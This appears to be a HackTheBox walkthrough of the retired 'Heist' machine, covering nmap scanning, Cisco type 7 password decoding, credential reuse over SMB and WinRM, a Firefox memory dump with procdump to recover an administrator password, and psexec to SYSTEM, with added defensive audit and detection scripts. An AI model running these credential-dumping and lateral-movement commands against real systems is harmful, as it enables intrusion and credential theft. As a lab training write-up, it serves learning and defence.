We always start with an nmap scan.
nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Wed Jul 7 08:15:43 2021 as: nmap -sC -sV -oA nmap 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.51s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3h00m54s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-07-07T10:17:59
|_  start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 7 08:17:41 2021 -- 1 IP address (1 host up) scanned in 118.25 seconds
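Before moving on, it is worth pulling the defender-relevant findings out of that scan rather than eyeballing them: the session cookie is missing HttpOnly, TRACE is enabled on IIS, and SMB signing is not required. The script below is an added example (not part of this writeup or of nmap) that parses nmap's normal output format and turns those NSE lines into findings with a fix; the sample text is a constructed excerpt modelled on the scan above, and the indicator table and field names are my own.

```python
# Added example: triage nmap -oN style output for hardening findings.
# Sample scan text is a constructed excerpt modelled on the writeup's scan.
import re

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")

# Substring seen in NSE output -> (finding id, recommended fix)
INDICATORS = {
    "httponly flag not set": ("cookie-no-httponly", "set HttpOnly (and Secure) on session cookies"),
    "Potentially risky methods: TRACE": ("http-trace-enabled", "disable TRACE to prevent cross-site tracing"),
    "Message signing enabled but not required": ("smb-signing-optional", "require SMB signing via policy"),
}

def parse_nmap(text: str) -> dict:
    """Return {'ports': [...], 'host_scripts': [...]} from -oN style text.
    Script lines start with '| ' or '|_' and attach to the last port seen,
    or to the host once 'Host script results:' has appeared."""
    ports, host_scripts = [], []
    current = None              # port entry currently being read
    in_host_section = False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2),
                       "state": m.group(3), "service": m.group(4),
                       "version": (m.group(5) or "").strip(), "scripts": []}
            ports.append(current)
            continue
        if line.startswith("Host script results:"):
            in_host_section = True
            continue
        if line.startswith("|"):
            # '|_' closes a script block; either way strip the prefix and indent
            body = line[2:].strip() if line.startswith("|_") else line[1:].strip()
            if in_host_section:
                host_scripts.append(body)
            elif current is not None:
                current["scripts"].append(body)
    return {"ports": ports, "host_scripts": host_scripts}

def findings(parsed: dict) -> list:
    """Match indicator strings against per-port and host script output."""
    out = []
    for p in parsed["ports"]:
        for s in p["scripts"]:
            for needle, (fid, fix) in INDICATORS.items():
                if needle in s:
                    out.append({"where": f"{p['port']}/{p['proto']}", "id": fid, "fix": fix})
    for s in parsed["host_scripts"]:
        for needle, (fid, fix) in INDICATORS.items():
            if needle in s:
                out.append({"where": "host", "id": fid, "fix": fix})
    return out

# Constructed sample, modelled on the scan output in the writeup.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.149
Host is up (0.51s latency).
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

if __name__ == "__main__":
    for f in findings(parse_nmap(SAMPLE_SCAN)):
        print(f"{f['where']:8} {f['id']:22} -> {f['fix']}")
```

Run it against a saved nmap.nmap file from -oA and extend INDICATORS with whatever NSE strings matter in your environment; the parser keeps every script line, so new indicators need no parser changes.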
Another day, another HackTheBox machine. We have our nmap scan result, but before going deeper let's check whether the WinRM port (5985) is open.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.149]
└─$ nmap -sV -sC -p 5985 10.10.10.149
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-07 13:11 WAT
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.56s latency).
PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.52 seconds
It is open. Now let's start our enumeration with SMB first.
There is no anonymous access to SMB, so let's hit HTTP.
I tried some default credentials with no luck, and a few SQL injection payloads got nothing either, but the page still offers "Login as guest", so let's try that.
The issues comment thread looks interesting: a user named hazard has attached a file, so let's check it out.
The file contains some password hashes that I think belong to hazard, so let's try cracking them all.
The website I used to decode them: https://www.ifm.net.nz/cookbooks/passwordcracker.html
0242114B0E143F015F5D1E161713 - $uperP@ssword
02375012182C1A1D751618034F36415408 - Q4)sJu\Y8qz*A3?d
One more hash to go; I used John the Ripper to crack that one.
stealth1agent
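The two strings the website decoded instantly are Cisco IOS type 7 passwords, and the reason they fall so fast is that type 7 is not a hash at all: it is a fixed-key XOR obfuscation that any config reader can reverse, while the third value (cracked with John) is a salted type 5 MD5 hash that actually needs offline cracking. The script below is an added example, not part of this writeup or of any Cisco tooling: a small config audit that flags each credential line by storage type so an administrator can find type 7 and type 5 entries and migrate them to type 8/9. The XOR key is the publicly documented IOS one; the sample config lines are constructed for this example (the two type 7 strings are the ones from the post, the type 5 and type 9 values are placeholders, not real hashes).

```python
# Added example: audit IOS-style config lines for weak credential storage.
# Shows why the "password 7" strings above were recoverable without cracking.
import re

# Fixed XOR key used by IOS type 7 obfuscation (publicly documented for decades).
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

def decode_type7(encoded: str) -> str:
    """Reverse a type 7 string: the first two characters are a decimal offset
    into TYPE7_KEY, and each following hex pair is one plaintext byte XORed
    with the key byte at that rotating offset."""
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("malformed type 7 string")
    seed = int(encoded[:2])
    body = bytes.fromhex(encoded[2:])
    out = bytearray()
    for i, c in enumerate(body):
        out.append(c ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)])
    return out.decode("ascii")

# Matches "password 7 <hex>", "enable secret 5 <md5crypt>", "secret 9 <scrypt>" ...
CRED_LINE = re.compile(r"\b(?P<kw>password|secret)\s+(?P<type>\d)\s+(?P<val>\S+)")

def audit_config(text: str) -> list:
    """Return one finding per credential line, rated by how exposed it is."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = CRED_LINE.search(line)
        if not m:
            continue
        t = m.group("type")
        f = {"line": lineno, "type": int(t)}
        if t == "7":
            f.update(severity="high", plaintext=decode_type7(m.group("val")),
                     note="reversible obfuscation; plaintext recoverable by anyone who reads the config")
        elif t == "5":
            f.update(severity="medium",
                     note="salted MD5 (md5crypt); crackable with wordlists; migrate to type 8/9")
        elif t in ("8", "9"):
            f.update(severity="info", note="PBKDF2-SHA256 / scrypt; acceptable")
        elif t == "0":
            f.update(severity="critical", note="plaintext credential")
        else:
            f.update(severity="review", note="deprecated or unrecognised storage type")
        findings.append(f)
    return findings

# Constructed sample config, not the real file from the box.
# The two type 7 strings are the ones shown in the writeup; the type 5 and
# type 9 values below are placeholders, not real hashes.
SAMPLE_CONFIG = """\
! constructed sample
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
enable secret 5 $1$xxxx$PLACEHOLDERmd5cryptVALUE
username ops secret 9 $9$PLACEHOLDERscryptVALUE
"""

if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f)
```

The practical takeaway for the blue side is that "service password-encryption" only hides credentials from shoulder-surfing; any shared config backup, ticket attachment or git commit containing type 7 lines should be treated as a plaintext credential leak, which is exactly what happened here.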
Now I think we have 3 users and 3 passwords.
USERNAMES:
rout3r
hazard
admin
PASSWORDS:
$uperP@ssword
Q4)sJu\Y8qz*A3?d
stealth1agent
I tried these on the login form with no luck, so it's time to go back to SMB and see whether the credentials give us access there. Trying different combinations, I was able to list some shares with hazard:stealth1agent.
Now let's use lookupsid.py from impacket to enumerate more users.
lookupsid.py hazard:stealth1agent@heist.htb
We have more users now. To cut the story short, I was able to get in over WinRM with chase:Q4)sJu\Y8qz*A3?d using evil-winrm, found the same way I found hazard's password: by trying the known passwords against each user.
evil-winrm -i heist.htb -u chase -p 'Q4)sJu\Y8qz*A3?d'
Going to chase's desktop we have user.txt; now we just need to own the system.
System / Administrator
I spent some time enumerating the box and noticed a firefox process running, which is strange.
So I uploaded procdump64.exe and dumped one of those firefox processes.
upload procdump64.exe
./procdump64.exe -accepteula
./procdump64.exe -ma 2528
Then I uploaded strings64.exe.
upload strings64.exe
./strings64.exe -accepteula
Now let's use strings64.exe to search the firefox dump file.
./strings64.exe firefox.exe_210707_175550.dmp
Searching the output for "password", I found the admin credentials: 4dD!5}x/re8]FBuZ
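From the defender's side this step is very visible: a Sysinternals dump tool was run from a WinRM shell against a browser process, and the dump was then fed to strings. The script below is an added example (not part of this writeup, and not a real product rule) that walks process-creation events in order, keeps a PID-to-image table so that "procdump64.exe -ma 2528" can be resolved to the firefox process it targets, and raises an alert when a dump tool is pointed at a browser. The event records are constructed in a simplified Sysmon Event ID 1 style; the field names, file paths, PIDs and the account that owned the firefox process are all assumptions for the example.

```python
# Added example: detect memory dumps of browser processes from process-creation logs.
# Event records are constructed in a simplified Sysmon Event ID 1 style; field
# names, paths, PIDs and the firefox process owner are assumptions.
DUMP_TOOLS = {"procdump.exe", "procdump64.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
FULL_DUMP_FLAGS = {"-ma", "-mp"}   # procdump: full dump / MiniPlus dump

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()

def detect_memory_dumps(events: list) -> list:
    """Walk process-creation events in order, remember pid -> image, and
    flag dump-tool launches whose first non-flag argument (a PID or image
    name) resolves to a browser."""
    pid_to_image = {}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        pid_to_image[ev["ProcessId"]] = ev["Image"]
        tool = _basename(ev["Image"])
        if tool not in DUMP_TOOLS:
            continue
        args = ev["CommandLine"].split()[1:]
        flags = {a.lower() for a in args if a.startswith("-")}
        targets = [a for a in args if not a.startswith("-")]
        if not targets:            # e.g. the bare "-accepteula" run: nothing dumped
            continue
        target = targets[0]
        if target.isdigit():
            target_image = pid_to_image.get(int(target), "<unknown pid>")
        else:
            target_image = target
        target_name = _basename(target_image)
        alerts.append({
            "pid": ev["ProcessId"], "user": ev["User"], "parent": _basename(ev["ParentImage"]),
            "tool": tool, "target": target_name,
            "full_dump": bool(flags & FULL_DUMP_FLAGS),
            # any dump of a process is worth a look; a browser holds session secrets
            "severity": "high" if target_name in BROWSERS else "medium",
        })
    return alerts

# Constructed sample events modelled on the steps in this writeup.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 2528,
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe"',
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"WORKSTATION\Chase"},
    {"EventID": 1, "ProcessId": 4412,
     "Image": r"C:\Users\Chase\Documents\procdump64.exe",
     "CommandLine": "./procdump64.exe -accepteula",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe", "User": r"WORKSTATION\Chase"},
    {"EventID": 1, "ProcessId": 4420,
     "Image": r"C:\Users\Chase\Documents\procdump64.exe",
     "CommandLine": "./procdump64.exe -ma 2528",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe", "User": r"WORKSTATION\Chase"},
    {"EventID": 1, "ProcessId": 4430,
     "Image": r"C:\Users\Chase\Documents\strings64.exe",
     "CommandLine": "./strings64.exe firefox.exe_210707_175550.dmp",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe", "User": r"WORKSTATION\Chase"},
]

if __name__ == "__main__":
    for a in detect_memory_dumps(SAMPLE_EVENTS):
        print(a)
```

Two things to note when turning this into a real rule: the parent of wsmprovhost.exe tells you the dump was taken over WinRM rather than at the console, and Sysmon Event ID 10 (ProcessAccess) catches the same behaviour even when the tool is renamed, because what matters is the handle opened on the browser with read access, not the binary name. The fix that would have stopped the privilege escalation is not leaving a privileged login session (and the browser that typed it) running on a host where lower-privileged users get shells.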
Nice. Time to use psexec.py to log in with the admin credentials we found in the firefox dump.
psexec.py administrator@10.10.10.149
We are in. Let's get the last flag.
And we are system.
Greetings from Muzec